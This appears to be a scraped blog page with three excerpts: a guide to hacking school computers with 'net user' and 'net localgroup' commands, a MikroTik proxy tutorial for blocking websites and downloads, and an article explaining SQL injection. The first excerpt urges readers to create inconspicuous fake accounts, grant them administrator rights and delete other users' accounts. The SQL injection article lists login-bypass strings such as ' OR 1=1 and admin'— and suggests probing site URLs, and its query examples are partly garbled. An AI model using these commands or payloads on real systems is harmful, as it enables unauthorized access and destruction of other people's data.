use commas to divide the names and NO SPACES between them.

Adding/modifying user accounts

Now that you have a command prompt, you can add a new user (ie yourself) like so

C:>net user username /ADD

where username is the name of your new account. And remember, try and make it look inconspicuous, then they'll just think its a student who really is at school, when really, the person doesn't EXIST! IF you wanna have a password, use this instead:

C:>net user username password /ADD

where password is the password you want to have. So for instance the above would create an account called 'username', with the password being 'password'. The below would have a username of 'JohnSmith' and a password of 'fruity'

C:>net user JohnSmith fruity /ADD

Right then, now that we can create accounts, let's delete them:)

C:>net user JohnSmith /DELETE

This will delete poor liddle JohnSmith's account. Awww. Do it to you enemies:P no only joking becuase they could have important work... well okay only if you REALLY hate them:)

Let's give you admin priveleges:)

C:>net localgroup administrator JohnSmith /ADD

This will make JohnSmith an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

You can list all the localgroups by typing

C:>net localgroup

Running .exe files you can't usually run

In the command prompt, use cd (change directory) to go to where the file is, use DIR to get the name of it, and put a shortcut of it on to a floppy. Run the program off the floppy disk.

Read More

How to Block Websites & Stop Downloading Using Proxy

This example will explain you “How to Block Web Sites” & “How to Stop Downloading”.

First, Configure Proxy.

/ip proxy 

set parent-proxy=0.0.0.0
set parent-proxy-port=0
set cache-administrator="webmaster"
set max-cache-size=none
set cache-on-disk=no
set max-client-connections=600
set max-server-connections=600
set max-fresh-time=3d
set always-from-cache=no
set cache-hit-dscp=4
set serialize-connections=no

Now, Make it Transparent

/ip firewall nat
add chain=dstnat protocol=tcp dst-port=80 action=dst-nat to-addresses=
to-ports=8080

Make sure that your proxy is NOT a Open Proxy

/ip firewall filter
add chain=input in-interface= src-address=0.0.0.0/0\
    protocol=tcp dst-port=8080 action=drop

Now for Blocking Websites

/ip proxy access
add dst-host=www.vansol27.com action=deny 

It will block website http://www.vansol27.com, We can always block the same for different networks by giving src-address. It will block for particular source address.

We can also stop downloading files like.mp3, .exe, .dat, .avi,…etc.

/ip proxy access
add path=*.exe action=deny 
add path=*.mp3 action=deny 
add path=*.zip action=deny 
add path=*.rar action=deny.

Try with this also

/ip proxy access
add dst-host=:mail action=deny

This will block all the websites contain word “mail” in url.
Example: It will block www.hotmail.com, mail.yahoo.com, www.rediffmail.com
ENJOY BLOCKING…….

Read More

How Hackers Hack Your Website: Overview of Common Techniques

We hear the same terms bandied about whenever a popular site gets hacked. You know… SQL Injection, cross site scripting, that kind of thing. But what do these things mean? Is hacking really as inaccessible as many of us imagine — a nefarious, impossibly technical twilight world forever beyond our ken?
Not really.
When you consider that you can go to Google right now and enter a search string which will return you thousands of usernames and passwords to websites, you realize that this dark science is really no mystery at all. You'll react similarly when you see just how simple a concept SQL Injection is, and how it can be automated with simple tools. Read on, to learn the basics of how sites and web content management systems are most often hacked, and what you can do to reduce the risk of it happening to you.

SQL Injection

SQL Injection involves entering SQL code into web forms, eg. login fields, or into the browser address field, to access and manipulate the database behind the site, system or application.
When you enter text in the Username and Password fields of a login screen, the data you input is typically inserted into an SQL command. This command checks the data you've entered against the relevant table in the database. If your input matches table/row data, you're granted access (in the case of a login screen). If not, you're knocked back out.

The Simple SQL Injection Hack
In its simplest form, this is how the SQL Injection works. It's impossible to explain this without reverting to code for just a moment. Don't worry, it will all be over soon.
Suppose we enter the following string in a Username field:

' OR 1=1
The authorization SQL query that is run by the server, the command which must be satisfied to allow access, will be something along the lines of:
SELECT * FROM users WHERE username = ?USRTEXT '
AND password = ?PASSTEXT?
…where USRTEXT and PASSTEXT are what the user enters in the login fields of the web form.
So entering `OR 1=1 — as your username, could result in the following actually being run:
SELECT * FROM users WHERE username = ?' OR 1=1 — 'AND password = '?
Two things you need to know about this:
['] closes the [username] text field.
'' is the SQL convention for Commenting code, and everything after Comment is ignored. So the actual routine now becomes:
SELECT * FROM users WHERE username = '' OR 1=1
1 is always equal to 1, last time I checked. So the authorization routine is now validated, and we are ushered in the front door to wreck havoc.
Let's hope you got the gist of that, and move briskly on.
Brilliant! I'm gonna go hack me a Bank!
Slow down, cowboy. This half-cooked method won't beat the systems they have in place up at Citibank, evidently.

But the process does serve to illustrate just what SQL Injection is all about — injecting code to manipulate a routine via a form, or indeed via the URL. In terms of login bypass via Injection, the hoary old ' OR 1=1 is just one option. If a hacker thinks a site is vulnerable, there are cheat-sheets all over the web for login strings which can gain access to weak systems. Here are a couple more common strings which are used to dupe SQL validation routines:
username field examples:

• admin'—
• ') or ('a'='a
• ”) or (“a”=”a
• hi” or “a”=”a

… and so on.
Backdoor Injection- Modules, Forums, Search etc.
Hacking web forms is by no means limited exclusively to login screens. A humble search form, for instance, is necessarily tied to a database, and can potentially be used to amend database details. Using SQL commands in search forms can potentially do some extremely powerful things, like calling up usernames and passwords, searching the database field set and field names, and amending same. Do people really get hacked through their search forms? You better believe it. And through forums, and anywhere else a user can input text into a field which interacts with the database. If security is low enough, the hacker can probe the database to get names of fields, then use commands like INSERT INTO, UNION, and so forth to get user information, change product prices, change account settings/balances, and just about anything else… depending on the security measures in place, database architecture and so on.
So you can have security locked down at the login, but poor security on other forms can still be exploited. Unfortunately this is a real worry regarding 3rd party modules for Web CMS products which incorporate forms, and for CMS products these 3rd party modules are often the weakest links which allows hackers access to your database.
Automated Injection
There are tools to automate the process of SQL Injection into login and other fields. One hacker process, using a specific tool, will be to seek out a number of weak targets using Google (searching for login.asp, for instance), then insert a range of possible injection strings (like those listed above, culled from innumerable Injection cheat-sheets on the Web), add a list of proxies to cover his movements, and go play XBox while the program automates the whole injection process.
Remote Injection
This involves uploading malicious files to inject SQL and exploit other vulnerabilities. It's a topic which was deemed beyond the scope of this report, but you can view this PDF if you'd like to learn more.
SQL Injection in the Browser Address Bar
Injections can also be performed via the browser address bar. I don't mean to have a pop at Microsoft, but when it comes to such vulnerabilities, HTTP GET requests with URLs of the following form are most often held to be vulnerable:
http://somesite.com/index.asp?id=10
Try adding an SQL command to the end of a URL string like this, just for kicks:
http://somesite.com/index.asp?id=10 AND id=11
See if both articles come up. Don't shoot your webmaster just yet if it's your own site and you get two articles popping up: this is real low-level access to the database. But some such sites will be vulnerable. Try adding some other simple SQL commands to the end of URLs from your own site, to see what happens.

Read More